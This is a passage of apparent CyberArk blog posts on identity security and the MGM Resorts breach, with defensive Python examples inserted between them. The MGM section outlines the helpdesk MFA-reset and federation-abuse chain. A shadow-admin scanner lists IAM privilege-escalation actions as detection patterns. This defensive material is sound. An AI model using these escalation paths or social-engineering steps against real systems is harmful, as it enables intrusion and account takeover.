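    if secret.compromised:
        return "revoke-now"
    max_age = MAX_AGE[secret.tier]
    age = now - secret.rotated_at
    if age >= max_age:
        return "overdue"
    if age >= max_age - max_age / 10:
        return "due-soon"
    return "ok"


def rotate(secret: Secret, now: datetime, emergency: bool = False) -> int:
    """Create a new version; keep the old one valid for GRACE_WINDOW unless this is an emergency.
    Returns the new version number."""
    old = secret.current_version
    new = old + 1
    secret.valid_versions[old] = now if emergency else now + GRACE_WINDOW
    secret.valid_versions[new] = None
    secret.current_version = new
    secret.rotated_at = now
    secret.compromised = False
    return new


def expire_versions(secret: Secret, now: datetime) -> List[int]:
    """Revoke versions whose grace window has passed; returns the revoked version numbers."""
    revoked = [v for v, until in secret.valid_versions.items()
               if until is not None and until <= now]
    for v in revoked:
        del secret.valid_versions[v]
    return revoked


def audit(inventory: List[Secret], now: datetime) -> Dict[str, str]:
    return {s.name: rotation_status(s, now) for s in inventory}


def sample_inventory(now: datetime) -> List[Secret]:
    """Constructed sample inventory spanning three clouds."""
    return [
        Secret("aws/prod/deploy-key", "critical", 3, now - timedelta(days=45), {3: None}),
        Secret("gcp/analytics/sa-key", "high", 1, now - timedelta(days=85), {1: None}),
        Secret("azure/webhook-token", "standard", 7, now - timedelta(days=10), {7: None}),
        Secret("aws/ci/github-token", "high", 2, now - timedelta(days=5), {2: None},
               compromised=True),
    ]


if __name__ == "__main__":
    inv = sample_inventory(NOW)
    for name, status in audit(inv, NOW).items():
        print(f"{name:26} {status}")
    ci = inv[3]
    rotate(ci, NOW, emergency=True)
    print("emergency rotation revoked versions:", expire_versions(ci, NOW))
```

The grace window is the design choice worth arguing about: rotating with no overlap causes outages in consumers that cache the old value, which is what pushes teams back toward static secrets, while a long overlap widens the exposure window the article warns about. The emergency path sidesteps the trade-off entirely by revoking at once, which is the "revoke and replace instantly" mechanism of the last bullet.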

Insight 6: Non-Vaulted Admin Accounts – The Exposed Crown Jewels

Admin accounts are the crown jewels of any IT infrastructure, granting privileged access to the heart of systems and data. In the realms of AWS, GCP and Azure, these accounts, when not vaulted, can be likened to leaving the keys to the kingdom unguarded. As businesses expand their cloud presence, securely managing these accounts, with their elevated permissions, is essential.

To mitigate this risk, you can:

  • Implement and enforce MFA for all admin accounts. This ensures an extra layer of security even if credentials are somehow compromised.
  • Audit and review access logs and trails across AWS, GCP and Azure. And do so regularly. This helps in the early detection of any anomalies or unauthorized access attempts.
  • Create a mechanism and process to detect and vault new admins (and make sure to separate federated from local admins with actual credentials).
  • Set up a solution for secure access using these sensitive secrets without exposing them to end users while keeping a full audit of all activity.

Taking Cloud Security Action

Where the Insight to Action framework is organized around substantial threats to your cloud environments, the CyberArk Blueprint is organized around target personas and privileges grouped into security control families. Every organization has unique prioritization needs and a different existing risk posture. By leveraging the CyberArk Blueprint for CIPS and the Insight to Action framework together, your organization can develop a tailor-made strategy and approach to securing your multi-cloud environments.

Stay tuned! The evolving cloud landscape promises more insights and innovations. We are excited to guide you through them in upcoming blogs.

Paddy Viswanathan is vice president of Cloud Solution Strategy at CyberArk.

Engaging Insiders to Combat Insider Threats https://www.cyberark.com/blog/engaging-insiders-to-combat-insider-threats/ Fri, 29 Sep 2023 15:05:21 +0000 https://www.cyberark.com/?p=183007

Every IT and security leader loses sleep over insider threats. They’re notoriously difficult to detect, costly to mitigate and can lead to widespread loss and reputational damage. Despite efforts to mitigate insider threats, current global risks and economic pressure are fueling the flame. There’s no silver bullet for insider threat protection, however a greater focus on culture, engagement and empowerment can make a real difference.

The Path to a Mega Breach is Paved with Good Intentions

Edward Snowden, the man behind the biggest intelligence leak in history, largely shaped how the world views insider threats. Since that landmark case, insider threats are often depicted as shadowy malicious characters, stealthy corporate saboteurs or dogged whistleblowers.

In reality, most insider threats are caused by well-intentioned employees who make mistakes or take security shortcuts. For instance, a Stanford University study shows that one in four employees admit to clicking on a phishing link. Sixty-three percent of security professionals report increased risk due to workers using unapproved AI tools, according to our latest CyberArk Identity Security Threat Landscape Report.

Even legitimate AI use can create significant risk. Reports this month indicate that a well-intentioned Microsoft AI team accidentally leaked 38TB of company data while contributing open-source AI learning models to a public GitHub repository. Additionally, numerous studies show that employees regularly use unmanaged personal devices to access company resources, violating corporate policies. These are just a few of the many ways that employees become inadvertent insider threats.

But it’s not just employees that represent risk: the infamous Target breach was one of the first to push third-party insider threats into the spotlight. Third-party partners, consultants and service providers who access sensitive corporate resources for valid purposes can easily become unwitting or malicious insider threats, and set off a far-reaching ripple across large, tightly interconnected digital ecosystems. This may be why security professionals indicate that third parties represent today’s riskiest human identities.

Building a Strong Cybersecurity Culture Is Imperative

According to the 2023 Verizon DBIR, 74% of all breaches include the human element, with people involved via error, privilege misuse, use of stolen credentials or social engineering. This means that cybersecurity must focus heavily on people – not just technology (though both ingredients are necessary.)

In the words of the famous management consultant Peter Drucker, “Culture eats strategy for breakfast.” Fostering a strong cybersecurity culture requires effort from everyone.

Management is responsible for setting the right tone (and modeling secure practices), defining processes to help identify and address risky behaviors and driving cross-functional collaboration. At the same time, it must empower employees with ongoing education and positive reinforcement that builds trust, changes attitudes and habits and, ultimately, creates more resilient organizations. There’s room for growth in this area.

A recent Wall Street Journal report shows that managers routinely miss opportunities to strengthen cybersecurity culture, citing over-emphasis on technology, failure to test incident response procedures and annual check-the-box training as typical examples. According to IBM research, these shortcomings could be fatal to an organization, as the average data breach now costs $4.45 million. Maintaining a security-first culture and mindset across the organization is simply non-negotiable.

Employees and third-party users must also understand why cybersecurity hygiene is so important and make more concerted efforts to be part of the solution. This starts by taking a hard look at how their habits may contribute to organizational risk, such as using unauthorized web apps, allowing family members to use their corporate devices or failing to protect credentials (by using weak passwords, reusing passwords for various purposes, saving passwords in browsers, etc.)

Six Ways to Encourage Bystander Engagement to Mitigate Insider Threats


Insider threat mitigation can also mean speaking up. If a worker sees something that seems off, it’s their responsibility to report it. On the flip side, their employer is responsible for encouraging this bystander engagement and vigilance by:

  • Developing safe reporting methods to ensure that personnel reporting insider threat concerns remain anonymous and protected from potential retaliation.
  • Prioritizing continued cybersecurity education to help people understand the ever-changing attack landscape and common social engineering techniques to watch out for, such as phishing, vishing and smishing. Workers can respond to potential threats more effectively with regular training and engagement.
  • Outlining specific signs and behaviors that could indicate potential internal threats, including unusual data movement, use of unapproved apps or hardware and privilege escalation to access information and systems that aren’t core to job function.
  • Communicating transparent and narrowly defined rules to employees and third-party users that reinforce personal accountability and emphasize the importance of company policies, procedures and information security best practices.
  • Establishing policies and best practices for compliance, including separating or segregating duties (SoD) and requiring more than one person to complete a critical task.
  • Dedicating security operations center (SOC) resources to handling and analyzing insider threat information and activity.

Top-to-bottom efforts to identify and act on insider threat concerns mean organizations can more effectively engage workers who display potential risk indicators. The right technology can also help drive positive outcomes when systems are correctly configured to address security gaps. For example, machine learning tools with adaptive security capabilities enable organizations to baseline user behaviors and reduce false positives in detecting cyber anomalies.

When it comes to insider threats, employees and third-party users are the first and last line of defense for safeguarding your organization’s most critical assets. But it’s up to you to empower them with the critical knowledge, processes and underlying technology they need to succeed.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page.

The MGM Resorts Attack: Initial Analysis https://www.cyberark.com/blog/the-mgm-resorts-attack-initial-analysis/ Fri, 22 Sep 2023 20:35:47 +0000 https://www.cyberark.com/?p=182900

The recent cyberattack on MGM Resorts International has raised serious concerns about the security of sensitive data and the vulnerabilities organizations face in today’s digital landscape. In this blog post, we will dive into the details of the attack based on the information currently available, analyze its root causes and discuss key takeaways to help organizations strengthen their security posture.

MGM Attack: What We Know (Thus Far)

Allegedly, a criminal gang made up of U.S. and U.K.-based individuals that cybersecurity experts call Scattered Spider (aka Roasted 0ktapus, UNC3944 or Storm-0875) initiated a social engineering attack that led to the near shutdown of MGM Resorts International. MGM Resorts International is a global hospitality and entertainment company, with a portfolio of 29 hotel and resort properties, including iconic brands like Bellagio, MGM Grand and Mandalay Bay.

(Did you attend Black Hat at the Mandalay Convention Center this year? Yes, this could directly affect you.)

A social engineering attack allowed the threat actor to burrow into the MGM environment and establish a foothold. CyberArk Labs, along with many experts in the cybersecurity community, currently believes that the attackers had usernames and passwords from previous data breaches, which still worked because of the common mistake of password reuse. With additional information collected from a high-value user’s LinkedIn profile, they hoped to dupe the helpdesk into resetting the user’s multi-factor authentication (MFA). They were successful.

Based on available information, as it currently stands, threat actors also were observed creating persistence in MGM’s network by configuring an entirely additional Identity Provider (IdP) in the Okta tenant using a feature called “inbound federation.” The function is intended to allow the fast connection of different Okta tenants during mergers of companies. In this case, though, the threat actors used it to increase their control of the victim’s networks. (As we say in the industry, “It’s not a bug; it’s a feature!”)

It also appears that the attackers gained control not only of Okta but also of the Microsoft Azure cloud environment. This already jeopardized the applications managed by the IAM platform, but now all their cloud assets were also in danger.

Our threat actors were eventually discovered. MGM’s incident response team began by terminating the Okta sync servers, where Scattered Spider had deployed some additional credential harvesting techniques. This ultimately resulted in the complete termination of the Okta platform and of the threat actors’ initial access. HOWEVER, the damage had been done. The threat actors had already exfiltrated an unknown number of terabytes of data and still had access to the cloud platform. It was time to make their presence known.

This was when the BlackCat/ALPHV ransomware group was called in. Using this RaaS offering, Scattered Spider encrypted several hundred of MGM’s ESXi servers, which hosted thousands of VMs supporting hundreds of systems widely used in the hospitality industry. This caused cascading chaos. As the ESXi hosts became encrypted one after another, the applications running on them crashed … one after another … after another. Hotel room keys no longer worked. Dinner reservation systems were down. Point-of-sale systems were unable to take payments. Guests were unable to check in or out. Slot machines were completely unavailable. At this point, MGM was hemorrhaging money – and potentially its credibility.

Once the threat actors acquired their initial foothold, they could begin to escalate their privileges. They ultimately acquired the privileged access to the accounts running the IAM infrastructure. This allowed them significant access to the MGM network.

What made this attack worse than a compromise limited to MGM’s Okta environment and the applications connected to it was that the IdP solution granted highly privileged access to Azure, which ultimately allowed the cloud-originated attack to reach MGM’s brick-and-mortar operations. Scattered Spider deployed BlackCat/ALPHV ransomware, which encrypted several hundred ESXi hosts in MGM’s virtual machine infrastructure. This severely impacted MGM’s operations.

The full extent of what systems were compromised and what data was leaked is still unknown. Still, gaming industry analyst David Katz says that MGM Resorts is losing as much as $8.4 million in revenue every day until it fixes the problems caused by the ongoing cyberattack. There is still so much to this story that we won’t know the full extent of the damage for quite some time.

Graphical depiction of the MGM cyberattack flow.


CyberArk Labs’ Critical Initial Takeaways from the MGM Attack

Although it’s still too early to definitively say what exactly happened in the MGM attack, the following initial assessments from our team are as relevant now as they’ll be once the dust settles:

  • Attacking IAM platforms is a common tactic that threat actors use. It gives persistent access to an organization and extends attacker privileges into more systems, causing more damage. This isn’t anything new to us either. We discussed this in the aftermath of the SolarWinds breach, along with best practices for configuring and monitoring your IAM platform.
  • The worst part of this breach was that MGM’s IdP was configured in a way that allowed Scattered Spider to pivot into their VMware infrastructure: in particular, the synchronization of credentials between on-prem and cloud resources gave them that pivot. This is where we believe that BlackCat/ALPHV became involved.
  • BlackCat/ALPHV is an operator CyberArk Labs has tracked for some time now. We recently released a free and open-source tool called White Phoenix that helps victims recover from ransomware attacks. (Because the encrypted files were ESXi files rather than PDFs, there is unfortunately not much this tool could do to help MGM.)
  • RaaS is big business and part of the larger criminal supply chain. Just as commercial businesses rely on SaaS applications to do their work, so do criminal gangs. BlackCat/ALPHV provides the professional services Scattered Spider lacks (i.e., malware creation, back-end C2, Tor leak site, malware support and negotiation services).
  • The MFA device reset was a significant chokepoint in the attack. Had the MFA device reset not been possible, or had it been detected in time, the threat actors would have faced real limits on continuing their attack. Hence, binding the MFA device to a specific phone number associated with the user could have offered an effective mitigation.
  • IAM infrastructure, including federation servers, Okta sync servers – and even CyberArk vaults – should be considered Tier 0 assets. Their compromise could lead to paralyzing a significant portion of a network. Securing access to these assets and limiting them to dedicated proxies is extremely important in mitigating future attacks.

Lessons Learned and Mitigation Strategies

To strengthen security measures and mitigate similar attacks, organizations should consider the following strategies:

1. Contain Impact

Minimizing exposure of privileged accounts is vital in mitigating phishing attempts. IT administrators should use privileged access management (PAM) solutions, reducing the risk of compromise through attacks (including vishing). Organizations should also consider implementing zero standing privilege (ZSP) where applicable.

We like to say, “It’s hard to hack a credential when it literally doesn’t exist.” While internal or external compromises may still occur, this contains the attack to a dedicated endpoint, which can help minimize exposure and assist with incident response.

2. Improve MFA Control

Creating visibility into MFA device changes is essential. Implementing specific logs for customers to monitor in their security information and event management (SIEM) systems can help detect and respond to unusual authentication activities. Additionally, implementing a dual control feature can enhance security by requiring multiple authorizations for critical actions.

3. Protect Tier 0 Assets

Tier 0 assets must be protected, including signing keys and access to critical infrastructure. Implementing endpoint privilege security on federation servers can help safeguard signing keys from credential theft attempts. Furthermore, preventing unauthorized access to Tier 0 assets by limiting access to proxies along with dual controls is crucial.

4. Adopt IdP Best Practices

  • Implement MFA controls before allowing users to change/alter their MFA factors (i.e., you must present a current MFA factor before altering one of your MFA factors enrolled).
  • Employ helpdesk verification controls (i.e., the helpdesk may only reset a password once the user has verified their identity through a pre-existing enrolled MFA factor).
  • Always check a user’s device enrollment/compliance before allowing a user (especially an administrator) access to your IdP.
  • Identify secure zones in your network. Understand network traffic to your IdP that does not meet your expectations. Limit actions that can be taken outside of your Secure Zones.
  • Manage IdP administrator accounts in the same way database/domain admin accounts are managed (i.e., through privileged access controls such as rotating administrator passwords, monitoring/isolating admin sessions and enforcing dual access controls to access credentials).
  • Monitor trust changes, such as identity provider (IdP) modifications; this is essential for detecting suspicious activity. Organizations should consider implementing specific logs to track and analyze trust changes, providing valuable insight into potential security breaches.
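Two of the controls above (helpdesk-driven MFA factor resets, and logging of IdP trust changes such as the inbound federation abuse described earlier) are straightforward to express as detection rules. The Python below is an added example, not CyberArk's or Okta's code: it runs two such rules over constructed events whose shape is modelled on Okta System Log JSON. The eventType strings are the ones I understand Okta uses for IdP lifecycle and MFA factor changes (an assumption to confirm against your own tenant's log), and the "secure zone" CIDR is an assumed allowlist of admin egress addresses.

```python
"""Detection rules for IdP trust changes and third-party MFA resets over Okta-style System Log events.

Added example, not CyberArk's or Okta's code. Events are constructed to resemble Okta
System Log JSON (simplified). eventType strings are assumed to match Okta's names for
IdP lifecycle and MFA factor events; verify against your tenant. SECURE_ZONES is an
assumed allowlist of admin egress addresses (TEST-NET-3, a documentation range).
"""
import ipaddress
from typing import Dict, List

SECURE_ZONES = [ipaddress.ip_network("203.0.113.0/24")]

# Trust-changing event types: any of these warrants a page, not just a log line.
IDP_TRUST_EVENTS = {
    "system.idp.lifecycle.create",
    "system.idp.lifecycle.update",
    "system.idp.lifecycle.activate",
}
MFA_RESET_EVENTS = {"user.mfa.factor.reset_all", "user.mfa.factor.deactivate"}

# Constructed sample events.
SAMPLE_EVENTS: List[Dict] = [
    {"published": "2023-09-10T02:14:00Z", "eventType": "user.session.start",
     "actor": {"id": "u1", "displayName": "Alice Admin", "type": "User"},
     "target": [], "client": {"ipAddress": "203.0.113.7"}},
    {"published": "2023-09-10T02:31:00Z", "eventType": "user.mfa.factor.reset_all",
     "actor": {"id": "u9", "displayName": "Helpdesk Agent", "type": "User"},
     "target": [{"id": "u1", "displayName": "Alice Admin", "type": "User"}],
     "client": {"ipAddress": "203.0.113.9"}},
    {"published": "2023-09-10T02:40:00Z", "eventType": "system.idp.lifecycle.create",
     "actor": {"id": "u1", "displayName": "Alice Admin", "type": "User"},
     "target": [{"id": "idp7", "displayName": "partner-federation", "type": "IdentityProvider"}],
     "client": {"ipAddress": "198.51.100.23"}},
    {"published": "2023-09-10T09:00:00Z", "eventType": "user.mfa.factor.deactivate",
     "actor": {"id": "u2", "displayName": "Bob User", "type": "User"},
     "target": [{"id": "u2", "displayName": "Bob User", "type": "User"}],
     "client": {"ipAddress": "203.0.113.50"}},
]


def in_secure_zone(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SECURE_ZONES)


def evaluate(event: Dict) -> List[Dict]:
    """Return zero or more alerts for one event."""
    alerts = []
    etype = event["eventType"]
    ip = event.get("client", {}).get("ipAddress", "")
    actor_id = event["actor"]["id"]
    targets = event.get("target", [])
    if etype in IDP_TRUST_EVENTS:
        # A new or changed IdP is a trust change: every occurrence is critical, and
        # the alert records whether it came from outside the secure zone.
        names = [t.get("displayName") for t in targets if t.get("type") == "IdentityProvider"]
        alerts.append({"severity": "critical", "rule": "idp-trust-change",
                       "detail": f"{etype} on {names} by {actor_id}",
                       "outside_secure_zone": not in_secure_zone(ip)})
    if etype in MFA_RESET_EVENTS:
        # A reset performed by someone other than the user (the helpdesk path)
        # is the pattern that should trigger a dual-control check.
        for t in targets:
            if t.get("type") == "User" and t["id"] != actor_id:
                alerts.append({"severity": "high", "rule": "third-party-mfa-reset",
                               "detail": f"{actor_id} reset factors for {t['id']}",
                               "outside_secure_zone": not in_secure_zone(ip)})
    return alerts


def run(events: List[Dict]) -> List[Dict]:
    return [alert for event in events for alert in evaluate(event)]


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert)
```

On the sample, Bob deactivating his own factor produces nothing, the helpdesk reset of an admin's factors produces a high-severity alert even though it came from inside the secure zone, and the IdP creation from an unknown address produces a critical one. Correlating the two (a factor reset followed minutes later by a trust change on the same user) is the next step a SIEM rule would take.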

Final Thoughts (For Now)

A series of mistakes ultimately led to one of the most visible and brand-damaging attacks in years. To mitigate similar attacks, organizations should focus on minimizing the exposure of privileged accounts, implementing strong authentication measures such as MFA, protecting Tier 0 assets, monitoring trust changes and staying updated on evolving cyber threats. It’s a lot to do, but it’s crucial for organizations to continuously improve their security measures and follow best practices to protect themselves in today’s digital landscape.

Andy Thompson is CyberArk Labs’ Offensive Research Evangelist.


Editor’s note: For more insights from CyberArk Labs’ Andy Thompson on this subject and beyond, check out his appearance on CyberArk’s Trust Issues podcast episode, “Analyzing the MGM and Okta Breaches: the Identity Connection.” The episode is available on most major podcast platforms.

Securing Workforce Access with Greater Visibility, Integration and Automation https://www.cyberark.com/blog/securing-workforce-access-with-greater-visibility-integration-and-automation/ Thu, 21 Sep 2023 22:32:35 +0000 https://www.cyberark.com/?p=182795

Over six in 10 security decision-makers say their teams operate with limited visibility across their environments. Why? We could easily speculate that it comes down to the tools they do or don’t use. However, two-thirds of enterprises now have tools from up to 40 different security vendors in place, and they’re still struggling for insights into the constant cycle of identities seeking access.

I believe there’s a bigger-picture challenge we need to – and can – solve for.

In many ways, securing the workforce’s access to applications, devices and resources such as sensitive data is about being a constant observer of human behavior – and asking yourself the following questions in a perpetual loop:

  • What are your users seeking to access and why?
  • What actions are they trying to take with sensitive resources?
  • Do the findings (to the preceding questions) align with what’s appropriate for a given worker’s role within the enterprise?

The problem is that you need immediate answers to these questions every time a user attempts to authenticate. And you need to know the answers for every user – across your ecosystem of employees and vendors, among others.

To get the visibility we need, the solution will come down to three variables: insights on user behavior, automated actions and integration enabling tools to share and act on data.

All Seeing, All Knowing – How to Observe and Secure Workforce Access Behavior

While various analytics tools have been in market for a while, enterprise security teams need capabilities beyond simple feeds and dashboards. Today’s threats call for a sophisticated user behavior analytics (UBA) engine serving as a centralized brain and nervous system – all-seeing, all-knowing.

Individual humans can’t independently maintain a real-time study of every user’s actions. Nor can they instantly infer a set of behavioral traits from the past that could indicate whether a person logging in is indeed that user – or an attacker. And yet, having that type of knowledge would be a game-changer.

This is where it helps to have a UBA engine capable of:

  • Compiling and analyzing a historical log of user access behavior.
  • Vetting access attempts in real time and autonomously detecting any signs of variation from typical behavior.
  • Integrating with smart authentication tools – for example, adaptive multi-factor authentication (MFA) – to make automated decisions on handling any access attempt.

Let’s explore some scenarios in which such capabilities can help security teams make faster, smarter decisions that defend against attacks and support the business.

Scenario 1: Preventing Attacks – Anytime, Anywhere

Imagine a scenario in which an attacker steals a user’s password from a compromised website and figures out where the user works through LinkedIn. It’s 2:30 a.m.: the user and security team are sleeping, but the attacker is very much awake – testing out the password to see if it’s reused across enterprise apps storing sensitive data.

All the signals point to a threat, and here’s what the UBA and adaptive MFA would see: the log-in attempt is happening at a time when the employee is never active. It’s coming from a region the employee never travels to. What’s more, the IP address is atypical and the device is unfamiliar.

In this scenario, let’s say the MFA is integrated with the UBA engine – and can relay insights about the log-in attempt to the UBA, like hands sending sensory information to the brain. In lockstep, the UBA weighs the signals against the actual user’s history. It’s an attack. The UBA decides which actions to take, including:

  • Adapting the log-in process to invoke stronger authentication challenges such as phishing-proof secondary factors (e.g., physical tokens) and knowing in which order to require them.
  • Preventing access until the actual user can scan a unique QR code to approve access on their pre-enrolled mobile device.

How Else Can Automation and Integration Help?

Enterprises can also use automated, no-code workflows for continuous threat detection and response. Imagine another scenario where an attacker compromises a privileged user’s account.

In this instance, an automated workflow could detect a potentially malicious action – e.g., when a new SSH key is created in a privileged session – and alert your team via Slack. Through “if-then” logic, the workflow could automatically remediate the session, temporarily suspending the user’s access, while your team investigates. Or the workflow could relocate the user into a pre-defined high-risk user group with minimal access.

Scenarios like the ones we’ve highlighted here are a win for organizations looking to build toward a security-first approach to workforce access. They’re also a win for security leaders seeking ways to operate more efficiently. With capabilities from UBA, adaptive MFA and automated workflows, securing access can involve fewer work hours, staff and costs.

And with the right capabilities, these insights can be at a security admin’s fingertips – providing the ability to drill down into details, including every factor that influenced the automated decision.

Scenario 2: Improving Productivity and User Experience

We’ll continue with another example: an employee working late on a cross-country flight. The stakes: she’s putting the final touches on a product launch essential for improving the customer experience.

Her laptop is open. WiFi is on. SSO accepts her password. Next up: MFA to get into a collaboration app where she’s managing the project. Here, frictionless UX is essential; the employee is on deadline. But you can’t put security on the back burner: The same web applications your users need to access are also the No. 1 attack vector in eight out of 10 incidents. In this in-flight scenario, a context-aware MFA/UBA combo would see that the log-in attempt is coming:

1. From a pre-approved device.
2. On a typical weekday (a usual workday for her).
3. At a regular time of day – her user history reflects the fact that she travels regularly to and from the given region.

Of course, visibility is best when paired with automated capabilities to act upon what’s seen. The dynamic duo of UBA and adaptive MFA can apply contextual insights to make a decision. In this low-risk case, the UBA can determine that secondary authentication isn’t necessary and allow the user to access the application – without compromising security.

The outcome: the employee authenticates safely and efficiently, completing her project on deadline. And this is a win for her company’s security team’s ability to show that security-first access can be an enabler rather than a barrier to progress.
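Both scenarios come down to the same decision: weigh the signals of a login attempt against the user's baseline and pick an action. As an added example (not CyberArk's product logic), the Python below does that for the 2:30 a.m. credential-stuffing attempt from Scenario 1 and the in-flight login from Scenario 2. The baseline, signal weights and thresholds are constructed assumptions; a real UBA engine learns them from history and combines many more signals than these five.

```python
"""Context-aware risk scoring for a login attempt against a user's behavioural baseline.

Added example, not CyberArk's product logic. The baseline, signal weights and
thresholds are constructed assumptions for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Set, Tuple


@dataclass
class Baseline:
    """What 'normal' looks like for one user, learned from past successful logins."""
    active_hours: Set[int]          # hours of day (UTC) the user is normally active
    active_weekdays: Set[int]       # 0 = Monday .. 6 = Sunday
    regions: Set[str]
    known_devices: Set[str]
    known_ip_prefixes: Set[str]     # coarse /24 prefixes, e.g. "203.0.113"


@dataclass
class Attempt:
    user: str
    at: datetime
    region: str
    device_id: str
    ip: str


# Assumed weights: each anomalous signal adds risk; thresholds map risk to an action.
WEIGHTS = {"off_hours": 25, "off_day": 10, "new_region": 30, "new_device": 25, "new_ip": 15}
STEP_UP_THRESHOLD = 30   # above this, demand a phishing-resistant factor (e.g. hardware token)
BLOCK_THRESHOLD = 70     # above this, hold access until approved out of band (e.g. QR on enrolled phone)


def signals(attempt: Attempt, baseline: Baseline) -> List[str]:
    fired = []
    if attempt.at.hour not in baseline.active_hours:
        fired.append("off_hours")
    if attempt.at.weekday() not in baseline.active_weekdays:
        fired.append("off_day")
    if attempt.region not in baseline.regions:
        fired.append("new_region")
    if attempt.device_id not in baseline.known_devices:
        fired.append("new_device")
    if attempt.ip.rsplit(".", 1)[0] not in baseline.known_ip_prefixes:
        fired.append("new_ip")
    return fired


def decide(attempt: Attempt, baseline: Baseline) -> Tuple[str, int, List[str]]:
    """Return (action, score, fired_signals); action is 'allow', 'step_up' or 'hold'."""
    fired = signals(attempt, baseline)
    score = sum(WEIGHTS[s] for s in fired)
    if score > BLOCK_THRESHOLD:
        action = "hold"
    elif score > STEP_UP_THRESHOLD:
        action = "step_up"
    else:
        action = "allow"
    return action, score, fired


# Constructed baseline for the employee in both scenarios: weekday daytime, the two
# regions she commutes between, one managed laptop, two office IP ranges.
EMPLOYEE_BASELINE = Baseline(
    active_hours=set(range(7, 23)),
    active_weekdays={0, 1, 2, 3, 4},
    regions={"US-CA", "US-NY"},
    known_devices={"laptop-4f2a"},
    known_ip_prefixes={"203.0.113", "198.51.100"},
)


def scenario_attacker() -> Attempt:
    """Scenario 1: 2:30 a.m. on a Sunday from an unfamiliar region, device and IP."""
    return Attempt("alice", datetime(2023, 9, 17, 2, 30, tzinfo=timezone.utc),
                   "EU-RO", "unknown-1", "192.0.2.77")


def scenario_in_flight() -> Attempt:
    """Scenario 2: Tuesday evening, managed laptop, usual region, but in-flight Wi-Fi gives a new IP."""
    return Attempt("alice", datetime(2023, 9, 19, 21, 5, tzinfo=timezone.utc),
                   "US-NY", "laptop-4f2a", "192.0.2.10")


if __name__ == "__main__":
    for name, attempt in (("attacker", scenario_attacker()), ("in-flight", scenario_in_flight())):
        print(name, decide(attempt, EMPLOYEE_BASELINE))
```

The returned signal list is what gives the security admin the "every factor that influenced the automated decision" drill-down the article mentions: the attacker's attempt trips all five signals and is held for out-of-band approval, while the in-flight login trips only the unfamiliar IP, which on its own stays under the step-up threshold and is allowed.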

Embracing and Effecting Change in Securing Today’s Workforce

Visibility is the first step in making smarter decisions regarding workforce access. Automation can help your team do more. With the proper controls and capabilities – built into an integrated approach that brings tools together to share and act on data – you can significantly improve your security posture and support the business.

For more insights on how you can secure your organization from identity-related threats, check out this video from CyberArk experts on what capabilities are needed to balance securing the workforce and ensuring productivity.

Gil Rapaport is the general manager for Identity and Access at CyberArk.

Cloud Identity Security Success: 3 Critical Factors https://www.cyberark.com/blog/cloud-identity-security-success-3-critical-factors/ Tue, 19 Sep 2023 19:05:54 +0000 https://www.cyberark.com/?p=182566

Today, more than ever, security is all about identity. Especially in the cloud, the central management and proliferation of cloud services means that with the proper identity and permissions, one can do almost anything (legitimate or malicious).

Product management has been my focus for over 15 years, and in that time, I have experienced multiple IT and ecosystem transformations. Let me tell you, it’s never easy for organizations. When I joined CyberArk three years ago, I wanted to understand how our customers dealt with cloud transformations. Specifically, I wanted to know how identity security programs could transform with IT. I talked to many experts within the organization and with customers, trying to understand what’s most important in implementing a cloud identity security program – and to deduce from these insights where our development focus should be.

Given my experience, the following are what I consider to be the key factors to cloud identity security success:

1. Smart Risk Reduction

Some would say that security is all about systematic risk reduction. Many solutions today utilize cloud APIs and central management and specialize in providing cloud security posture. These solutions aim to identify risks to your cloud configurations and help prioritize them; identity and access management (IAM) is an essential part of that.

But we don’t just want recommendations to fix misconfigurations. We need meaningful insights and the ability to act on them quickly. For example, we want to swiftly identify low-hanging fruit such as dormant identities that just sit there increasing your attack surface. We also want to identify high-risk identities such as shadow admins – identities and roles that can elevate their own permissions and move laterally – so we can rapidly take action to secure them.

As we systematically reduce risk, we want to keep to least privilege principles and remove standing access in favor of zero standing permissions. We should have a solution built to drive immediate actions from insights.
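As an added example (not CyberArk code), the following Python scan flags the two risks just named, dormant identities and shadow admins, in a constructed cloud IAM inventory and orders the findings so the cheapest, highest-value fixes come first. The inventory format, the 90-day dormancy threshold and the list of escalation actions (AWS IAM action names are used for illustration) are assumptions.

```python
"""Flag dormant identities and shadow admins in a cloud IAM inventory.

Added example, not CyberArk code: the inventory format, the dormancy
threshold and the escalation-action list are assumptions for illustration.
"""
from dataclasses import dataclass
from datetime import date, timedelta
from fnmatch import fnmatchcase
from typing import Optional

# Actions that let an identity change its own (or another identity's)
# permissions, i.e. a privilege escalation path. AWS IAM action names are
# used for illustration; the set is an assumption and not exhaustive.
ESCALATION_ACTIONS = {
    "iam:AttachUserPolicy", "iam:AttachRolePolicy", "iam:PutUserPolicy",
    "iam:PutRolePolicy", "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:AddUserToGroup", "iam:UpdateAssumeRolePolicy", "iam:CreateAccessKey",
    "iam:CreateLoginProfile", "iam:UpdateLoginProfile", "iam:PassRole",
}
DORMANT_AFTER_DAYS = 90  # assumption: no authentication for 90 days = dormant


@dataclass(frozen=True)
class Identity:
    name: str
    kind: str                  # "user" or "role"
    actions: frozenset         # allowed actions; wildcards such as "iam:*" permitted
    last_used: Optional[date]  # None = never authenticated


def allows(identity, action):
    """True if any allowed action pattern (with * wildcards) covers `action`."""
    return any(fnmatchcase(action, pattern) for pattern in identity.actions)


def is_full_admin(identity):
    """Explicit, standing admin: an unrestricted '*' action."""
    return "*" in identity.actions


def is_shadow_admin(identity):
    """Not an explicit admin, but holds at least one self-elevation action."""
    return not is_full_admin(identity) and any(allows(identity, a) for a in ESCALATION_ACTIONS)


def is_dormant(identity, today):
    if identity.last_used is None:
        return True
    return (today - identity.last_used).days > DORMANT_AFTER_DAYS


def assess(identities, today):
    """Return findings keyed by identity name, highest-priority first."""
    severity = {"shadow-admin": 3, "full-admin": 2, "dormant": 1}
    findings = {}
    for ident in identities:
        tags = []
        if is_full_admin(ident):
            tags.append("full-admin")
        elif is_shadow_admin(ident):
            tags.append("shadow-admin")
        if is_dormant(ident, today):
            tags.append("dormant")
        if tags:
            findings[ident.name] = tags
    # A dormant identity that can also escalate is the cheapest, highest-value
    # fix: remove it outright rather than trimming its permissions.
    return dict(sorted(findings.items(), key=lambda kv: -sum(severity[t] for t in kv[1])))


def recommended_action(tags):
    """Map a finding to the immediate action a least-privilege program would take."""
    if "dormant" in tags:
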